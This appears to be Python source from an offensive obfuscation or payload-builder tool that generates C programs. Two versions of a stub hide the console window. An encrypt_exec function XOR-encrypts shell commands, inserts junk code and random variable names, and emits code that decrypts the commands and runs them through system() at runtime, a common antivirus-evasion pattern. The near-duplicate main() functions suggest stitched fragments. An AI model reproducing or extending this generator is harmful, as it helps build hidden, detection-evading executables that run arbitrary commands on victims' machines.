def main(): hWnd = core.varname_creator() hw = "int main(int argc, char **argv){\n" hw += "HWND " + hWnd + " = GetConsoleWindow();\n" hw += "ShowWindow(" + hWnd + ", SW_HIDE);\n\n" return hw
def main(): hWnd = core.varname_creator() hw = "int main(int argc, char * argv[]){" hw += f"HWND {hWnd} = GetConsoleWindow();" hw += f"ShowWindow({hWnd}, SW_HIDE);\n" return hw
def encrypt_exec(commands, junkcode, intensity): # Decryptor func_name = core.varname_creator() arg_command = core.varname_creator() arg_key = core.varname_creator() arg_command_lenght = core.varname_creator() arg_key_lenght = core.varname_creator() arg_exec = core.varname_creator() i = core.varname_creator() func_stub = "void " + func_name + "(int " + arg_command + "[], int " + arg_key + "[], int " + arg_command_lenght + ", int " + arg_key_lenght + ", char " + arg_exec + "[])\n" func_stub += "{\n" func_stub += junk.junk_inject(junkcode, "code", intensity) func_stub += "for(int " + i + " = 0; " + i + "< " + arg_command_lenght + "; " + i + "++)" func_stub += "{\n" func_stub += junk.junk_inject(junkcode, "code", intensity) func_stub += arg_exec + "[" + i + "] = " + arg_command + "[" + i + "] ^ " + arg_key + "[" + i + " % " + arg_key_lenght + "];\n" func_stub += junk.junk_inject(junkcode, "code", intensity) func_stub += "}\n" func_stub += junk.junk_inject(junkcode, "code", intensity) func_stub += arg_exec + "[" + arg_command_lenght + "] = 0;\n" func_stub += junk.junk_inject(junkcode, "code", intensity) func_stub += "}\n" keylen = randrange(1024, 4096) key = ''.join(choice(digits) for i in range(keylen)) cmd = list() for command in commands: cmd.append(xor_encrypt(command, key)) vKeylen = core.varname_creator() vKey = core.varname_creator() vNumcommands = core.varname_creator() vSizeofcommands = core.varname_creator() vMaxcommandsize = core.varname_creator() vCommands = core.varname_creator() vExeccommands = core.varname_creator() i = core.varname_creator() code = "int " + vKeylen + f" = {len(key)};\n" code += junk.junk_inject(junkcode, "code", intensity) code += "int " + vKey + f"[] = {{{str([ord(k) for k in key])[1:-1]}}};\n" code += junk.junk_inject(junkcode, "code", intensity) code += "int " + vNumcommands + f" = {len(commands)};\n" code += junk.junk_inject(junkcode, "code", intensity) code += "int " + vSizeofcommands + f"[] = {{{', '.join([str(len(data)) for data in cmd])}}};\n" code += junk.junk_inject(junkcode, "code", intensity) max_length = max([len(data) for data in cmd]) code += "int " + vMaxcommandsize + f" = {max_length};\n" code += junk.junk_inject(junkcode, "code", intensity) code += "int " + vCommands + f"[][{max_length}] = {{{', '.join(['{' + str(cmds)[1:-1] + '}' for cmds in cmd])}}};\n" code += junk.junk_inject(junkcode, "code", intensity) code += "char " + vExeccommands + "[" + vNumcommands + "][" + vMaxcommandsize + " + 1];\n" code += junk.junk_inject(junkcode, "code", intensity) code += "for(int " + i + " = 0; " + i + " < " + vNumcommands + "; " + i + "++)\n" code += "{\n" code += junk.junk_inject(junkcode, "code", intensity) code += func_name + "(" + vCommands + "[" + i + "], " + vKey + ", " + vSizeofcommands + "[" + i + "], " + vKeylen + ", " + vExeccommands + "[" + i + "]);\n" code += junk.junk_inject(junkcode, "code", intensity) code += "system(" + vExeccommands + "[" + i + "]);" code += junk.junk_inject(junkcode, "code", intensity) code += "}\n" return func_stub, code